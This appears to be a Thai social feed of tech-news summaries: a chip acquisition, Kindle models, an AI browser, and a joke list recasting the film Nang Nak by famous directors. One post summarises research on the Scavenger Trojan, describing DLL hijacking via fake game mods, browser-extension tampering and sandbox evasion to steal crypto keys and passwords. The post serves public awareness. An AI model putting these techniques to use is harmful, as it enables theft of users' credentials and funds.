    ขาดทุนจากการปรับโครงสร้างและการด้อยค่าทรัพย์สิน 190 ล้านดอลลาร์

    https://www.thestar.com.my/tech/tech-news/2025/07/25/stmicro-to-buy-part-of-nxp-semiconductors039-sensor-business-for-up-to-950-million
    🎙️ เรื่องเล่าจากโลกเซมิคอนดักเตอร์: เมื่อ STMicro ขยายอาณาจักรด้วยเซนเซอร์จาก NXP ในยุคที่ตลาดชิปสำหรับยานยนต์และอุตสาหกรรมกำลังชะลอตัว STMicroelectronics กลับเดินเกมรุกด้วยการเข้าซื้อกิจการบางส่วนของ NXP Semiconductors ซึ่งเน้นด้าน MEMS-based electromechanical sensors เช่น: - เซนเซอร์ความปลอดภัยและการตรวจสอบสำหรับรถยนต์ - เซนเซอร์วัดแรงดันสำหรับระบบอุตสาหกรรม ดีลนี้มีรายละเอียดดังนี้: - จ่ายเงินสดล่วงหน้า 900 ล้านดอลลาร์ - จ่ายเพิ่มอีก 50 ล้านดอลลาร์ เมื่อบรรลุเป้าหมายทางเทคนิคบางประการ - ธุรกิจเซนเซอร์ของ NXP ที่ขายให้ STMicro มีรายได้ประมาณ 300 ล้านดอลลาร์ในปีที่ผ่านมา - คาดว่าการซื้อขายจะเสร็จสิ้นในครึ่งแรกของปี 2026 อย่างไรก็ตาม STMicro เพิ่งรายงานผลประกอบการขาดทุนไตรมาสแรกในรอบกว่า 10 ปี โดยมีค่าใช้จ่ายจากการปรับโครงสร้างและการด้อยค่าทรัพย์สินถึง 190 ล้านดอลลาร์ ✅ STMicroelectronics จะซื้อกิจการบางส่วนของธุรกิจเซนเซอร์จาก NXP ➡️ มูลค่ารวมสูงสุดถึง 950 ล้านดอลลาร์สหรัฐ ✅ ดีลนี้เน้นเซนเซอร์แบบ MEMS สำหรับยานยนต์และอุตสาหกรรม ➡️ เช่น เซนเซอร์ความปลอดภัยและเซนเซอร์วัดแรงดัน ✅ STMicro จะจ่ายเงินสดล่วงหน้า 900 ล้านดอลลาร์ ➡️ และอีก 50 ล้านดอลลาร์เมื่อบรรลุเป้าหมายทางเทคนิค ✅ ธุรกิจเซนเซอร์ของ NXP มีรายได้ประมาณ 300 ล้านดอลลาร์ในปีที่ผ่านมา ➡️ เป็นธุรกิจที่มีศักยภาพแม้ตลาดชิปโดยรวมจะชะลอตัว ✅ การซื้อกิจการคาดว่าจะเสร็จสิ้นในครึ่งแรกของปี 2026 ➡️ อยู่ระหว่างการดำเนินการและตรวจสอบ ✅ STMicro รายงานผลขาดทุนไตรมาสแรกในรอบกว่า 10 ปี ➡️ ขาดทุนจากการปรับโครงสร้างและการด้อยค่าทรัพย์สิน 190 ล้านดอลลาร์ https://www.thestar.com.my/tech/tech-news/2025/07/25/stmicro-to-buy-part-of-nxp-semiconductors039-sensor-business-for-up-to-950-million
    WWW.THESTAR.COM.MY
    STMicro to buy part of NXP Semiconductors' sensor business for up to $950 million
    (Reuters) -French-Italian chipmaker STMicroelectronics said on Thursday it would acquire part of NXP Semiconductors' sensor unit for up to $950 million in cash.
    0 ความคิดเห็น 0 การแบ่งปัน 139 มุมมอง 0 รีวิว
  • เรื่องเล่าจากโลกของการอ่าน: เมื่อ Kindle สำหรับเด็กมีสีสันและความปลอดภัยมากขึ้น

    หลังจากเปิดตัว Kindle Colorsoft รุ่นแรกในปี 2024 ซึ่งเป็น Kindle ที่มีหน้าจอสี Amazon ได้เปิดตัวรุ่นใหม่ 2 รุ่นในปี 2025:

    Kindle Colorsoft Kids
    เป็น Kindle รุ่นหน้าจอสีสำหรับเด็กโดยเฉพาะ
    มีความสามารถเหมือนรุ่น 16GB ของผู้ใหญ่ เช่น หน้าจอ high-contrast, ปรับแสงอุ่นได้, และเปลี่ยนหน้ารวดเร็ว
    เพิ่มฟีเจอร์สำหรับเด็ก เช่น:
    - เคสป้องกัน
    - การรับประกัน 2 ปีแบบ “worry-free”
    - ระบบควบคุมโดยผู้ปกครอง
    - สมาชิก Amazon Kids+ ฟรี 1 ปี
    ไม่มีแอป, การแจ้งเตือน หรือข้อความที่รบกวนสมาธิ
    มีการเพิ่มหนังสือใหม่ใน Kids+ เช่น Artemis Fowl และ Percy Jackson

    Kindle Colorsoft รุ่น 16GB สำหรับผู้ใหญ่
    ลดราคาจากรุ่น 32GB เหลือ $249.99
    ตัดฟีเจอร์บางอย่าง เช่น:
    - ไม่มี wireless charging
    - ไม่มีเซ็นเซอร์ปรับแสงอัตโนมัติ
    แถม Kindle Unlimited ฟรี 3 เดือน

    https://www.neowin.net/news/kindle-colorsoft-now-has-a-colored-display-model-for-kids/
    🎙️ เรื่องเล่าจากโลกของการอ่าน: เมื่อ Kindle สำหรับเด็กมีสีสันและความปลอดภัยมากขึ้น หลังจากเปิดตัว Kindle Colorsoft รุ่นแรกในปี 2024 ซึ่งเป็น Kindle ที่มีหน้าจอสี Amazon ได้เปิดตัวรุ่นใหม่ 2 รุ่นในปี 2025: 🧒 Kindle Colorsoft Kids ✅ เป็น Kindle รุ่นหน้าจอสีสำหรับเด็กโดยเฉพาะ ✅ มีความสามารถเหมือนรุ่น 16GB ของผู้ใหญ่ เช่น หน้าจอ high-contrast, ปรับแสงอุ่นได้, และเปลี่ยนหน้ารวดเร็ว ✅ เพิ่มฟีเจอร์สำหรับเด็ก เช่น: - เคสป้องกัน - การรับประกัน 2 ปีแบบ “worry-free” - ระบบควบคุมโดยผู้ปกครอง - สมาชิก Amazon Kids+ ฟรี 1 ปี ✅ ไม่มีแอป, การแจ้งเตือน หรือข้อความที่รบกวนสมาธิ ✅ มีการเพิ่มหนังสือใหม่ใน Kids+ เช่น Artemis Fowl และ Percy Jackson 💰 Kindle Colorsoft รุ่น 16GB สำหรับผู้ใหญ่ ✅ ลดราคาจากรุ่น 32GB เหลือ $249.99 ✅ ตัดฟีเจอร์บางอย่าง เช่น: - ไม่มี wireless charging - ไม่มีเซ็นเซอร์ปรับแสงอัตโนมัติ ✅ แถม Kindle Unlimited ฟรี 3 เดือน https://www.neowin.net/news/kindle-colorsoft-now-has-a-colored-display-model-for-kids/
    WWW.NEOWIN.NET
    Kindle Colorsoft now has a colored display model for kids
    Amazon has announced two new variants of the Kindle Colorsoft, one is a cheaper version with significant downgrades, and the other is kid-friendly.
    0 ความคิดเห็น 0 การแบ่งปัน 104 มุมมอง 0 รีวิว
  • เรื่องเล่าจากโลกไซเบอร์: เมื่อเกมม็อดกลายเป็นประตูสู่การโจรกรรมคริปโต

    เรื่องเริ่มจากการสืบสวนของ Doctor Web ในรัสเซีย ซึ่งพบว่าแฮกเกอร์ใช้เทคนิค DLL Search Order Hijacking โดยวางไฟล์ DLL ปลอมในโฟลเดอร์ของแอปเป้าหมาย เพื่อให้ระบบโหลดไฟล์ปลอมแทนของจริง ทำให้มัลแวร์สามารถเข้าถึงข้อมูลภายในแอปได้โดยตรง

    มัลแวร์ Scavenger ถูกปลอมเป็นไฟล์เกมม็อด เช่น “performance patch” ของเกม Oblivion Remastered หรือไฟล์ .ASI สำหรับ GTA ซึ่งเมื่อผู้ใช้ติดตั้งตามคำแนะนำ มัลแวร์จะเริ่มทำงานเป็นขั้นตอน:

    1️⃣ Trojan.Scavenger1: ปลอมเป็นไฟล์ DLL เกม

    2️⃣ Trojan.Scavenger2: ดาวน์โหลดโมดูลเพิ่มเติม

    3️⃣ Trojan.Scavenger3: แฝงตัวในเบราว์เซอร์ Chromium เช่น Chrome, Edge, Opera
    - ปิดระบบ sandbox และการตรวจสอบ extension
    - แก้ไข extension ยอดนิยม เช่น MetaMask, Bitwarden, LastPass
    - ส่งข้อมูล mnemonic และรหัสผ่านไปยังเซิร์ฟเวอร์ของแฮกเกอร์

    4️⃣ Trojan.Scavenger4: เจาะเข้าแอป Exodus เพื่อขโมย private key และ mnemonic

    มัลแวร์ยังมีความสามารถหลบเลี่ยงการตรวจจับ:
    - ตรวจสอบว่าอยู่ใน VM หรือ debug environment แล้วหยุดทำงาน
    - ใช้การ handshake แบบเข้ารหัสก่อนสื่อสารกับเซิร์ฟเวอร์

    แม้ Doctor Web จะแจ้งนักพัฒนาแอปให้แก้ไขช่องโหว่ DLL hijacking แต่หลายรายปฏิเสธ ทำให้ผู้ใช้ต้องระวังเอง เช่น หลีกเลี่ยงการใช้เกมเถื่อน, ไม่โหลดไฟล์จากแหล่งที่ไม่น่าเชื่อถือ และอัปเดตแอนตี้ไวรัสเสมอ

    https://hackread.com/scavenger-trojan-crypto-wallets-game-mods-browser-flaws/
    🎙️ เรื่องเล่าจากโลกไซเบอร์: เมื่อเกมม็อดกลายเป็นประตูสู่การโจรกรรมคริปโต เรื่องเริ่มจากการสืบสวนของ Doctor Web ในรัสเซีย ซึ่งพบว่าแฮกเกอร์ใช้เทคนิค DLL Search Order Hijacking โดยวางไฟล์ DLL ปลอมในโฟลเดอร์ของแอปเป้าหมาย เพื่อให้ระบบโหลดไฟล์ปลอมแทนของจริง ทำให้มัลแวร์สามารถเข้าถึงข้อมูลภายในแอปได้โดยตรง มัลแวร์ Scavenger ถูกปลอมเป็นไฟล์เกมม็อด เช่น “performance patch” ของเกม Oblivion Remastered หรือไฟล์ .ASI สำหรับ GTA ซึ่งเมื่อผู้ใช้ติดตั้งตามคำแนะนำ มัลแวร์จะเริ่มทำงานเป็นขั้นตอน: 1️⃣ Trojan.Scavenger1: ปลอมเป็นไฟล์ DLL เกม 2️⃣ Trojan.Scavenger2: ดาวน์โหลดโมดูลเพิ่มเติม 3️⃣ Trojan.Scavenger3: แฝงตัวในเบราว์เซอร์ Chromium เช่น Chrome, Edge, Opera - ปิดระบบ sandbox และการตรวจสอบ extension - แก้ไข extension ยอดนิยม เช่น MetaMask, Bitwarden, LastPass - ส่งข้อมูล mnemonic และรหัสผ่านไปยังเซิร์ฟเวอร์ของแฮกเกอร์ 4️⃣ Trojan.Scavenger4: เจาะเข้าแอป Exodus เพื่อขโมย private key และ mnemonic มัลแวร์ยังมีความสามารถหลบเลี่ยงการตรวจจับ: - ตรวจสอบว่าอยู่ใน VM หรือ debug environment แล้วหยุดทำงาน - ใช้การ handshake แบบเข้ารหัสก่อนสื่อสารกับเซิร์ฟเวอร์ แม้ Doctor Web จะแจ้งนักพัฒนาแอปให้แก้ไขช่องโหว่ DLL hijacking แต่หลายรายปฏิเสธ ทำให้ผู้ใช้ต้องระวังเอง เช่น หลีกเลี่ยงการใช้เกมเถื่อน, ไม่โหลดไฟล์จากแหล่งที่ไม่น่าเชื่อถือ และอัปเดตแอนตี้ไวรัสเสมอ https://hackread.com/scavenger-trojan-crypto-wallets-game-mods-browser-flaws/
    HACKREAD.COM
    Scavenger Trojan Targets Crypto Wallets via Game Mods and Browser Flaws
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 151 มุมมอง 0 รีวิว
  • จะเป็นอย่างไรเมื่อ " นางนาก "ถูกสร้างโดยผู้กำกับ
    ชื่อดังทั่วโลก (ครบรอบ 26 ปีนางนาก)

    1. เซอร์ คริสโตเฟอร์ โนแลน
    - พี่มากกลับมาจากรบ และรู้ว่าแม่นากรอเขาจนตาย พี่มากเสียใจสุดๆ จึงพยายามทำทุกทางเพื่ออยากเจออีนากอีกครั้ง วันเวลาผ่านไปเป็นสิบปี จนเขาได้เจอกับคนที่อ้างว่ามาจากอนาคต และสามารถทำให้พี่มากย้อนเวลาไปหาอีนากได้ เขาจึงเข้าเครื่องย้อนเวลา และทำให้กลับไปเจออีนากอีกครั้ง อีนากตกใจกับผัวที่แก่ขึ้น และทั้งคู่ก็ทะเลาะกัน จนพี่มากพลั้งมือฆ่าอีนากตาย..

    2. เควนติน มารันติโน่
    - อีนากปากหมา ไล่ด่าทุกคน ก่อนเควนตินจะเปลี่ยนประวัติศาสตร์หนัง อีนากไม่ตาย แต่เป็นไอ้มากตายและกลายเป็นผีมาหลอกแทน

    3. หว่อง-กาไว
    - อีนากนั่งรอพี่มากที่ท่าน้ำกับบรรยากาศสุดเหงายามเย็นที่มีแสงไฟจากตะเกียง พร้อมอีนากหยิบยาสูบขึ้นมาสูบ ทุกอย่างมันสโลไปหมด ยกเว้นอีนากคนเดียว

    4. ปู่มาร์ตี้
    - พี่มากเป็นหัวหน้าแก๊งค์รีดไถ่เงินในพระโขนง มีเพื่อนสนิทอยู่ 4 คน และมีเมียเป็นอีนาก ก่อนที่อีนากจะเล่นชู้กับเพื่อนพี่มากพร้อมกับเป่าหูให้ทุกคนหักหลังกัน และทั้งเรื่องจะเป็นการหักเหลี่ยมกันของแก๊งค์ ที่มีฉากไล่ข้าวโพดเป็นตอนจบ

    5. ไมเคิล เบย์
    - อีนากไม่ได้ท้องและออกไปรอบกับไอ้มากด้วย พร้อมกับระเบิดภูเขาเผ่ากระท่อมเหมือนเดิม

    5.1. ไมเคิล เบย์
    -อีนากหนีมาจากดาวเคราะห์ไซเบอร์ตรอนแต่ระบบเสียงเสียพูดไม่ได้ จากนั้นอีนากจะส่งแสงขึ้นฟ้าเป็นรูปสัญลักษณ์ ไอ้มากเห็นจึงเดินทางมายังดาวเคราะห์ที่มีชื่อว่า โลกกกกก !?

    6. จอห์น วู
    - อีนากนั่งรอที่ท่าน้ำจะมีนกพิราบบินแบบสโลโมชั่น ฉากระเบิดที่สงครามไอ้มากไปรบต้องใหญ่ๆไฟและควันพุ่งขึ้นสูงๆ

    7. โรเบิร์ต รอดริเกซ
    - อีนากตาย และกลายเป็นแวมไพร์ ไล่ฆ่าคน

    8. พี่เจ้ย
    - อีนากปลงชีวิต เดินเข้าไปใช้ชีวิตในป่า เดินไปเจอกับธรรมชาติมากมาย ก่อนนางจะเข้าใจชีวิตมากขึ้น

    9. เอ็มไนต์ ชายามาลาน
    - อีนากตายเป็นผี ไอ้มากไม่รู้และไม่มีใครบอก เขาก็เลยอยู่กินกับผี จนพี่มากสังเกตและรู้เองว่าอีนากตายไปนานแล้ว ก่อนอีนากจะบอกว่า มึงก็ตายไปนานแล้วเหมือนกัน..

    10. เวส แอนเดอร์สัน
    - พระโขนงจะกลายเป็นสีพาสเทล

    11. พี่พจน์ อานนท์
    - พี่มากเป็นเกย์ และตบกะอีนาก

    12. คิมคิ ด็อก
    - ทั้งเรื่องจะเงียบ และไม่มีบทพูด อีนากจะเงียบและรอคอยพี่มาก แต่ตัวละครรอบข้างจะพูดปกติ

    13. เดวิด ฟินเชอร์
    - อีนากถูกฆาตกรรม จนไอ้มากต้องออกมาช่วยกันสืบคดี จนสุดท้ายไอ้มากเปิดลังกระดาษแล้วพบกับ!!

    14. หม่อมน้อย
    - ดีเทลทุกอย่างของคลองพระโขนงจะต้องเนี้ยบ เสื้อผ้าต้องเย็บใหม่ให้เหมือนในอดีต

    15. ลาร์ส ฟอร์นเทียร์
    - นางเอกจะติดเซ็กส์ และต้องการค้นหาตัวเอง

    16. เป็นเอก รัตนเรือง
    - ไม่เน้นผี เน้นตีความ

    17. พี่เต๋อ
    - ตัวละครทุกตัวจะพูดแบบเท่ๆ

    18. ทิม เบอร์ตัน
    - ทุกตัวละครจะขอบตาดำกันหมดแต่งกายด้วยชุดอังกฤษยุคเลเนซองค์

    19. เดอนี วีลเนิฟว์
    - ฉากหลังอีนากเป็นยุคไซเบอร์พังค์

    20. จอร์ด มิลเลอร์
    - เรื่องราวไม่ได้เกิดในพระโขนง แต่เกิดในทะเลทราย

    21. คูบริก
    นักแสดงนางนากจะถูกกังขังหน่วงเหนี่ยวไว้ จนกว่าจะยืดแขนเองได้

    22. เดวิด ลินซ์
    - มึงดูไม่เข้าใจกันหรอก

    23. จิบลิ
    - อีนากตายหลงเข้าไปในมิติวิญญาณ และไปทำงานในซ่องของโลกหลังความตาย

    24.ชิออน โซโนะ
    - อีนากเบื่อการเป็นแม่บ้าน จึงออกไปหาความสำราญจนโดนหลอก.. แต่ติดใจ

    25. ชินไค มาโคโตะ
    - แม่นากจะตามหาพี่มากตลอดไป จะost. ชื่อ 9.8 meter per sec ซึ่งมาจากความเร็วของมะนาวที่แม่นากทำหล่นจากชานบ้าน /เอ้าซู๊ดดดดดด

    26. อังลี่
    - อีนากคลอดลูกและรอดตาย ไอ้มากกลับมาปลอดภัย จนไอ้มากต้องไปทำงานเลี้ยงแกะบนเขา จนไปพบรักกับชายหนุ่มและทั้งคู่แอบเป็นชู้กัน

    27. พอล ดับบิวเอสแอนเดอสัน
    - แม่นากแสดงโดยเมียตัวเอง ให้แม่นากเก่งที่สุดในโลก มีพลังจิตมองตาพิฆาตสังหาร มีซอมบี้ เอาลูกซองที่ลูกกระสุนเป็นเหรียญลากหัวซอมบี้คมๆ

    28. เจมส์ เคเมรอน
    - สร้างพระโขนงขึ้นมาใหม่ เอาให้เหมือนจริงสุดๆ จนนักแสดงแก่หมดแล้ว หนังก็ยังสร้างไม่เสร็จ..

    29. ฮิโรคาสุ โคเรเอดะ
    - แม่นากไอ้มาก ลักเด็กที่ถูกทำร้ายจากครอบครัวอีปริกมาเลี้ยงและหลายๆคนในครอบครัวไม่ใช่สายเลือดเดียวกันเพราะอีนากมีลูกไม่ได้

    30. กีเยโมร์ เดลโทโร่
    -นางมากและไอ้มากอยู่ในหน่วยพิทักษ์โลเพราะในการขับหุ่นยนต์ยักเยเกอร์ต้องใช้พลขับ 2 คนโดยทั้ง 2 ขับหุ่นยนต์ที่ชื่อ ยิปซี แดนเจอร์ ขับไปไปขับมาเลยได้เสียกันอีนากท้อง จากนั้นจึงตั้งชื่อลูกว่าไอ้แดง

    31.โรเบิร์ต เซเมคิส
    - นางนากต้องเป็นคนที่ไอ้มากปักใจรักมากที่สุดในชีวิต ก่อนนางจะใช้ชีวิตแบบขนนกที่ล่องลอยไปแบบที่นางอยากเป็น ผิดกับไอ้มากที่หลังจากไปรบในสงครามก็ใช้ชีวิตแบบขนนกที่ปลิวไปตามสายลมลมจะหอบไปทางไหนแต่เขาก็ตั้งใจทำมันทุกๆอย่างจนประสบความสำเร็จ สุดท้ายอีนากก็มีลูกชายกับไอ้มากแล้วนางก็ตาย ทำให้ไอ้มากต้องดูแลลูกชายหรือไอ้แดงเพียงคนเดียว ไอ้มากจึงสอนลูกชายเสมอว่า " ความตายเป็นส่วนนึงของชีวิต และ ชีวิตก็เหมือนกล่องช็อคโกแลตเราไม่มีทางรู้ว่ามีรสชาติใดอยู่ข้างในบ้าง.."

    ที่เหลือก็หาผกก.ที่ชอบคอมเม้นท์มาเองนะ
    จะเป็นอย่างไรเมื่อ " นางนาก "ถูกสร้างโดยผู้กำกับ ชื่อดังทั่วโลก (ครบรอบ 26 ปีนางนาก) 1. เซอร์ คริสโตเฟอร์ โนแลน - พี่มากกลับมาจากรบ และรู้ว่าแม่นากรอเขาจนตาย พี่มากเสียใจสุดๆ จึงพยายามทำทุกทางเพื่ออยากเจออีนากอีกครั้ง วันเวลาผ่านไปเป็นสิบปี จนเขาได้เจอกับคนที่อ้างว่ามาจากอนาคต และสามารถทำให้พี่มากย้อนเวลาไปหาอีนากได้ เขาจึงเข้าเครื่องย้อนเวลา และทำให้กลับไปเจออีนากอีกครั้ง อีนากตกใจกับผัวที่แก่ขึ้น และทั้งคู่ก็ทะเลาะกัน จนพี่มากพลั้งมือฆ่าอีนากตาย.. 2. เควนติน มารันติโน่ - อีนากปากหมา ไล่ด่าทุกคน ก่อนเควนตินจะเปลี่ยนประวัติศาสตร์หนัง อีนากไม่ตาย แต่เป็นไอ้มากตายและกลายเป็นผีมาหลอกแทน 3. หว่อง-กาไว - อีนากนั่งรอพี่มากที่ท่าน้ำกับบรรยากาศสุดเหงายามเย็นที่มีแสงไฟจากตะเกียง พร้อมอีนากหยิบยาสูบขึ้นมาสูบ ทุกอย่างมันสโลไปหมด ยกเว้นอีนากคนเดียว 4. ปู่มาร์ตี้ - พี่มากเป็นหัวหน้าแก๊งค์รีดไถ่เงินในพระโขนง มีเพื่อนสนิทอยู่ 4 คน และมีเมียเป็นอีนาก ก่อนที่อีนากจะเล่นชู้กับเพื่อนพี่มากพร้อมกับเป่าหูให้ทุกคนหักหลังกัน และทั้งเรื่องจะเป็นการหักเหลี่ยมกันของแก๊งค์ ที่มีฉากไล่ข้าวโพดเป็นตอนจบ 5. ไมเคิล เบย์ - อีนากไม่ได้ท้องและออกไปรอบกับไอ้มากด้วย พร้อมกับระเบิดภูเขาเผ่ากระท่อมเหมือนเดิม 5.1. ไมเคิล เบย์ -อีนากหนีมาจากดาวเคราะห์ไซเบอร์ตรอนแต่ระบบเสียงเสียพูดไม่ได้ จากนั้นอีนากจะส่งแสงขึ้นฟ้าเป็นรูปสัญลักษณ์ ไอ้มากเห็นจึงเดินทางมายังดาวเคราะห์ที่มีชื่อว่า โลกกกกก !? 6. จอห์น วู - อีนากนั่งรอที่ท่าน้ำจะมีนกพิราบบินแบบสโลโมชั่น ฉากระเบิดที่สงครามไอ้มากไปรบต้องใหญ่ๆไฟและควันพุ่งขึ้นสูงๆ 7. โรเบิร์ต รอดริเกซ - อีนากตาย และกลายเป็นแวมไพร์ ไล่ฆ่าคน 8. พี่เจ้ย - อีนากปลงชีวิต เดินเข้าไปใช้ชีวิตในป่า เดินไปเจอกับธรรมชาติมากมาย ก่อนนางจะเข้าใจชีวิตมากขึ้น 9. เอ็มไนต์ ชายามาลาน - อีนากตายเป็นผี ไอ้มากไม่รู้และไม่มีใครบอก เขาก็เลยอยู่กินกับผี จนพี่มากสังเกตและรู้เองว่าอีนากตายไปนานแล้ว ก่อนอีนากจะบอกว่า มึงก็ตายไปนานแล้วเหมือนกัน.. 10. เวส แอนเดอร์สัน - พระโขนงจะกลายเป็นสีพาสเทล 11. พี่พจน์ อานนท์ - พี่มากเป็นเกย์ และตบกะอีนาก 12. คิมคิ ด็อก - ทั้งเรื่องจะเงียบ และไม่มีบทพูด อีนากจะเงียบและรอคอยพี่มาก แต่ตัวละครรอบข้างจะพูดปกติ 13. เดวิด ฟินเชอร์ - อีนากถูกฆาตกรรม จนไอ้มากต้องออกมาช่วยกันสืบคดี จนสุดท้ายไอ้มากเปิดลังกระดาษแล้วพบกับ!! 14. หม่อมน้อย - ดีเทลทุกอย่างของคลองพระโขนงจะต้องเนี้ยบ เสื้อผ้าต้องเย็บใหม่ให้เหมือนในอดีต 15. ลาร์ส ฟอร์นเทียร์ - นางเอกจะติดเซ็กส์ และต้องการค้นหาตัวเอง 16. เป็นเอก รัตนเรือง - ไม่เน้นผี เน้นตีความ 17. พี่เต๋อ - ตัวละครทุกตัวจะพูดแบบเท่ๆ 18. ทิม เบอร์ตัน - ทุกตัวละครจะขอบตาดำกันหมดแต่งกายด้วยชุดอังกฤษยุคเลเนซองค์ 19. เดอนี วีลเนิฟว์ - ฉากหลังอีนากเป็นยุคไซเบอร์พังค์ 20. จอร์ด มิลเลอร์ - เรื่องราวไม่ได้เกิดในพระโขนง แต่เกิดในทะเลทราย 21. คูบริก นักแสดงนางนากจะถูกกังขังหน่วงเหนี่ยวไว้ จนกว่าจะยืดแขนเองได้ 22. เดวิด ลินซ์ - มึงดูไม่เข้าใจกันหรอก 23. จิบลิ - อีนากตายหลงเข้าไปในมิติวิญญาณ และไปทำงานในซ่องของโลกหลังความตาย 24.ชิออน โซโนะ - อีนากเบื่อการเป็นแม่บ้าน จึงออกไปหาความสำราญจนโดนหลอก.. แต่ติดใจ 25. ชินไค มาโคโตะ - แม่นากจะตามหาพี่มากตลอดไป จะost. ชื่อ 9.8 meter per sec ซึ่งมาจากความเร็วของมะนาวที่แม่นากทำหล่นจากชานบ้าน /เอ้าซู๊ดดดดดด 26. อังลี่ - อีนากคลอดลูกและรอดตาย ไอ้มากกลับมาปลอดภัย จนไอ้มากต้องไปทำงานเลี้ยงแกะบนเขา จนไปพบรักกับชายหนุ่มและทั้งคู่แอบเป็นชู้กัน 27. พอล ดับบิวเอสแอนเดอสัน - แม่นากแสดงโดยเมียตัวเอง ให้แม่นากเก่งที่สุดในโลก มีพลังจิตมองตาพิฆาตสังหาร มีซอมบี้ เอาลูกซองที่ลูกกระสุนเป็นเหรียญลากหัวซอมบี้คมๆ 28. เจมส์ เคเมรอน - สร้างพระโขนงขึ้นมาใหม่ เอาให้เหมือนจริงสุดๆ จนนักแสดงแก่หมดแล้ว หนังก็ยังสร้างไม่เสร็จ.. 29. ฮิโรคาสุ โคเรเอดะ - แม่นากไอ้มาก ลักเด็กที่ถูกทำร้ายจากครอบครัวอีปริกมาเลี้ยงและหลายๆคนในครอบครัวไม่ใช่สายเลือดเดียวกันเพราะอีนากมีลูกไม่ได้ 30. กีเยโมร์ เดลโทโร่ -นางมากและไอ้มากอยู่ในหน่วยพิทักษ์โลเพราะในการขับหุ่นยนต์ยักเยเกอร์ต้องใช้พลขับ 2 คนโดยทั้ง 2 ขับหุ่นยนต์ที่ชื่อ ยิปซี แดนเจอร์ ขับไปไปขับมาเลยได้เสียกันอีนากท้อง จากนั้นจึงตั้งชื่อลูกว่าไอ้แดง 31.โรเบิร์ต เซเมคิส - นางนากต้องเป็นคนที่ไอ้มากปักใจรักมากที่สุดในชีวิต ก่อนนางจะใช้ชีวิตแบบขนนกที่ล่องลอยไปแบบที่นางอยากเป็น ผิดกับไอ้มากที่หลังจากไปรบในสงครามก็ใช้ชีวิตแบบขนนกที่ปลิวไปตามสายลมลมจะหอบไปทางไหนแต่เขาก็ตั้งใจทำมันทุกๆอย่างจนประสบความสำเร็จ สุดท้ายอีนากก็มีลูกชายกับไอ้มากแล้วนางก็ตาย ทำให้ไอ้มากต้องดูแลลูกชายหรือไอ้แดงเพียงคนเดียว ไอ้มากจึงสอนลูกชายเสมอว่า " ความตายเป็นส่วนนึงของชีวิต และ ชีวิตก็เหมือนกล่องช็อคโกแลตเราไม่มีทางรู้ว่ามีรสชาติใดอยู่ข้างในบ้าง.." ที่เหลือก็หาผกก.ที่ชอบคอมเม้นท์มาเองนะ
    0 ความคิดเห็น 0 การแบ่งปัน 200 มุมมอง 0 รีวิว
  • เรื่องเล่าจากเบราว์เซอร์ที่คิดแทนเรา: เมื่อหน้าจอเว็บมี AI ช่วยตลอดทาง

    Dia ไม่ใช่แค่เบราว์เซอร์ทั่วไปอย่าง Chrome หรือ Safari — แต่เป็นเบราว์เซอร์ที่มีช่องแชต AI อยู่เคียงข้างหน้าต่างเว็บแบบ in-app โดยกด shortcut (Command+E) เพื่อเรียกกล่องคำถามขึ้นมาข้างหน้าเว็บ

    ตัวอย่างจากผู้ใช้:
    - อ่านข่าวน้ำท่วมในเท็กซัส → พิมพ์ถาม AI เพื่อขอสรุปและแหล่งข้อมูลเพิ่ม
    - ดูวิดีโอรีวิวอุปกรณ์ Jump Starter → ให้ AI ดึง transcript มาสรุปข้อเด่นโดยไม่ต้องดูเอง
    - เขียนบน Google Docs → ถาม AI ว่าใช้คำว่า “on the cusp” ถูกไหม แล้วรับคำตอบทันที

    ที่สำคัญ Dia เลือก “โมเดล AI ที่เหมาะที่สุด” ให้แบบอัตโนมัติ เช่นถามเรื่องโค้ด → ใช้ Claude Sonnet / ถามเรื่องภาษา → ใช้ GPT จาก OpenAI โดยไม่ต้องเลือกเอง

    สัปดาห์เดียวกันนี้ Perplexity ก็เปิดตัวเบราว์เซอร์ AI ชื่อ Comet และมีรายงานว่า OpenAI เตรียมออกเบราว์เซอร์ AI เช่นกัน แปลว่า “ยุคเบราว์เซอร์ฉลาด” กำลังมาเร็วมาก

    Dia เป็นเบราว์เซอร์ใหม่ที่รวมแชตบอท AI เข้ากับหน้าเว็บโดยตรง
    กด Command+E เพื่อเปิดหน้าต่าง AI เคียงข้างหน้าเว็บ

    Dia ดึงคำตอบจากหลายโมเดล AI เช่น ChatGPT, Gemini, Claude โดยเลือกให้ผู้ใช้อัตโนมัติ
    เช่นใช้ Claude ถามเรื่องโค้ด, ใช้ GPT ถามเรื่องภาษา

    ตัวเบราว์เซอร์สามารถสรุปวิดีโอ, ข่าว, และช่วยพิสูจน์อักษรได้ทันทีจากหน้าเว็บ
    ไม่ต้องเปิดแอป AI แยกหรือก็อปปี้เนื้อหาไปใส่ทีละขั้น

    Dia ยังไม่เปิดตัวทั่วไป แต่ให้ทดลองฟรีบน Mac แบบเชิญเท่านั้น
    จะเปิดแพ็กเกจ subscription เริ่มต้น $5/เดือนในอีกไม่กี่สัปดาห์

    เบราว์เซอร์ AI จาก Perplexity (Comet) และ OpenAI ก็ถูกพูดถึงในช่วงเวลาเดียวกัน
    แสดงถึงการแข่งขันในตลาด AI-powered browser กำลังร้อนแรง

    Google และ Apple ก็เริ่มใส่ฟีเจอร์ AI เล็ก ๆ เช่นการสรุปบทความใน Chrome และ Safari
    แต่ยังไม่ถึงระดับการรวม chatbot แบบ Dia

    นักลงทุนคาดว่า AI browser จะเป็น “จุดเริ่มต้นใหม่” ของการใช้งาน generative AI ในชีวิตประจำวัน
    แทนที่การใช้แบบเดิมที่ต้องเปิดแอป AI แยก

    https://www.thestar.com.my/tech/tech-news/2025/07/23/is-ai-the-future-of-web-browsing
